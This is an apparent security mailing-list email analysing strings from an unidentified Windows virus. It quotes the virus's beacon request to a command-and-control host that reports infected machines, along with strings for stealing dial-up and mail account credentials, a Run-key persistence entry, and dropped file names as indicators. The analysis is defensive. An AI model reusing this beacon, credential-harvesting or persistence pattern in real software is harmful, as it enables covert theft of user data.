From: lorenzohgh at nsrg-security.com (Lorenzo Hernandez Garcia-Hierro)
Subject: New virus

Hi,
Look this line:
GET /events.php?%s HTTP/1.1
Accept: */*
Connection: Keep-Alive
Host: finance.red-host.com
id=%s&ip=%s&speed=%d&timeonline=%d
finance.red-host.com
so imagine this:
id=[autonumeric ]&ip=[internet address by gestaddrbyhost]&speed=[connection
speed]&timeonline=[seconds/minutes]

this logs the information about an infected host.
look more:
/* Written By Adrey Karimov [www.proantivirus.com] */
This can be a bogus data but , that boy is from an antivirus related company
! :) ( who are the virii authors now ? )

%s0x%02hx%02hx%02hx%02hx%02hx%02hx
S-%lu-
%s SC:%s
%s SW:%i.%i.%i.%i
%s PW:%i.%i.%i.%i
%s SD:%i.%i.%i.%i
%s PD:%i.%i.%i.%i
%s IP:%i.%i.%i.%i
%s%s:%s:%s [%s]
DialParamsUID
%sMicrosoft\Network\Connections\pbk\rasphone.pbk
%s\
LdapUnicodeToUTF8

Thsi calls the api of microsoft ras and insert the data into  a new
telefonic connection.

This functions are called , so the virus uses the memeroy stack:
strcat
strchr <-*
strcmp
strlen
strncat
strncpy <- *
strstr < - *

And it creates a file with the first data :

c:\temp35.txt

It keeps there the data found at SOFTWARE\Microsoft\Internet Account
Manager\Accounts

Other things that the virus do:
Software\Microsoft\Windows\CurrentVersion\Run
\sysdeb32.exe
31337
c:\tmp.exe
Creates a regkey to run it at startup and it copies to some locations.

stores this data ??? :
%-2.2X
%.8x%.8x
\svc.sav

I thin k some info is hardcoded .
The presence of sysdeb32.exe and tmp.exe indicates virus activity.

i don't know which virus is this.
xD

Best regards ,
-------------------------------
0x00->Lorenzo Hernandez Garcia-Hierro
0x01->\x74\x72\x75\x6c\x75\x78
0x02->The truth is out there,
0x03-> outside your mind .
PGP: Keyfingerprint
4ACC D892 05F9 74F1 F453  7D62 6B4E B53E 9180 5F5B
ID: 0x91805F5B
\x6e\x73\x72\x67
\x73\x65\x63\x75\x72\x69\x74\x79
\x72\x65\x73\x65\x61\x72\x63\x68